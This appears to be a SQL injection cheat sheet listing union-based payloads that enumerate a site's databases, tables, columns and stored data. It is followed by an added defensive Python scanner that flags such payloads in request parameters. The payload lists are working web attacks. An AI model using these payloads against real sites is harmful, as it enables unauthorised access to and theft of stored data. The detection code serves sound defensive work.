
Union-Based SQLi – Quick Method

Pick whichever injection method aligns with the field being injected.

Enumerate DB Names

Number Injection
' UNION SELECT 1,group_concat(schema_name),3,4,... from information_schema.schemata-- -
(Enumerate the # to go up to using: ' order by <#>-- -)
String Injection
' UNION SELECT 1,group_concat(schema_name),3,4,... from information_schema.schemata-- -
(Enumerate the # to go up to using: ' order by <#>-- -)

Enumerate all Tables from DB

Number Injection
1 and 1=2 UNION SELECT 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema='<DB Name>'-- -
String Injection
'UNION SELECT group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema='<DB Name>'-- -

Enumerate Columns in Table

Number Injection
1 and 1=2 UNION SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_name='<Table Name>'-- -
String Injection
'UNION SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_name='<Table Name>'-- -

Enumerate Data from Table

Number Injection
1 and 1=2 UNION SELECT 1, <Column Name>,3,4,<Column Name>,6,7 from <DB name>.<Table>-- -
String Injection
'UNION SELECT 1, <Column Name>,3,4,<Column Name>,6,7 from <DB name>.<Table>-- -
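
A defender-side view of the queries above, as an added example that is not part of the original page: a Python scan that flags request parameters carrying two or more of the markers these payloads share (UNION SELECT, information_schema lookups, group_concat, ORDER BY column-count probes, a trailing comment). The request URLs, parameter names and the 'shop' database name are constructed sample data, and the two-marker threshold is an assumption chosen to limit false positives.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Markers taken from the query shapes listed on this page (MySQL syntax).
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(
        r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*(?:--|#)"),
    "comment_tail": re.compile(r"(?:--(?:\s+-)?|#)\s*$"),
}

def normalize(value):
    """Lowercase and collapse whitespace so spacing and case do not matter."""
    return re.sub(r"\s+", " ", value.lower()).strip()

def scan_request(url):
    """Return {parameter: [marker names]} for parameters with >= 2 markers."""
    hits = {}
    # parse_qsl percent-decodes values and splits each pair on the first '='.
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = normalize(raw)
        found = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
        if len(found) >= 2:  # a single marker alone is too noisy to alert on
            hits[name] = found
    return hits

# Constructed sample requests, shaped like access-log request URLs.
SAMPLES = [
    # Table enumeration in a numeric field
    "/item.php?id=1%20and%201=2%20UNION%20SELECT%201,2,3,4,"
    "group_concat(table_name),6%20from%20information_schema.tables"
    "%20where%20table_schema=%27shop%27--%20-",
    # Column-count probe
    "/item.php?id=5%27%20order%20by%207--%20-",
    # Benign search text that happens to contain "union select"
    "/search?q=student+union+select+committee+minutes",
]

if __name__ == "__main__":
    for url in SAMPLES:
        result = scan_request(url)
        print("ALERT" if result else "ok   ", result, url[:40])
```

The first two sample requests are flagged and the benign search is not, because it matches only one marker.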